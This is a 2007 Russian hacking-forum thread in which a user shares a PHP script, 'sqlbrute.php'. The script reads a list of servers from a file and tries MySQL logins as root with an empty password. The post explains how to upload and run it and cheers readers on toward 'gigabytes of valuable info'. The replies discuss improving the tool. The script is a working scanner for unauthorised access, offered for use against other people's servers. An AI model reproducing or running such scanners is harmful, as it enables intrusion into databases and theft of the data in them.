Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Сканер MySQL (https://forum.antichat.xyz/showthread.php?t=46392)

Rast1k 09.08.2007 15:57
Сканер MySQL
 
Хочу представить вашему вниманию сканер.
Код сканера взят с inattack.ru (c)
Код:
<?
set_time_limit(0);
# берём список серверов для сканирования из файла servers.dat
$servers=file("servers.dat");
# получаем кол-во записей в файле
$strings=count($servers);
for($i=0; $i<$strings; $i++){
$server=$servers[$i];
# функция коннекта к базе, передаем переменную $server
connect($server);
}
function connect($server)
# а вот и сама функция подключения
{
# коннект к базе (сервер,"логин","пароль")
$co=mysql_connect($server,"root","");
# если подключится не удалось
if(!($co))
{
echo "connect 2 server $server failed<br>";
}
# если подключились то выводим сообщение
else
{
echo "connect 2 server $server success<br>";
}
}
?>
Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
достаточно много и кто ищет тот всегда найдёт.
Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.

Ch3ck 09.08.2007 16:03
Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...

madnet 09.08.2007 16:19
Цитата:
Сообщение от Dr.Check
Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...
А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?

Ch3ck 09.08.2007 16:20
Цитата:
А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?
Так я и написал, что надо вывод в файл делать а не в браузер. Закроешь и пистец результату.

Rast1k 09.08.2007 16:34
ignore_user_abort();
Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.

Ch3ck 09.08.2007 16:52
Цитата:
Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.
Вот кто писал этот скрипт, тот криворукий.
Представь, что в файле 10000000 ссылок. И подумай сколько они будет проверятся. Мне кажется удобнее, то закрыть браузер на это время. Потом я более чем уверен, что ты будешь делать копипаст из браузера, в файл. Тебе говорят как удобнее будет. И как правильнее.

Rast1k 09.08.2007 16:56
Хорошо учту.
Но в файле столько ссылок быть не может ;)

p-range 11.08.2007 11:56
Цитата:
Вот кто писал этот скрипт, тот криворукий.
насколько я помню, написал 1dt.w0lf_, но не столь важно. скрипт уже не актуален, ибо сервера MySQL очень редко оставляют с дефолтовым доступом root:пустой пароль.
можно, конечно, его переделать так чтобы проводить брут, но на php сканирование будет проходить медленно, да и брутеров mysql много уже...


Время: 17:06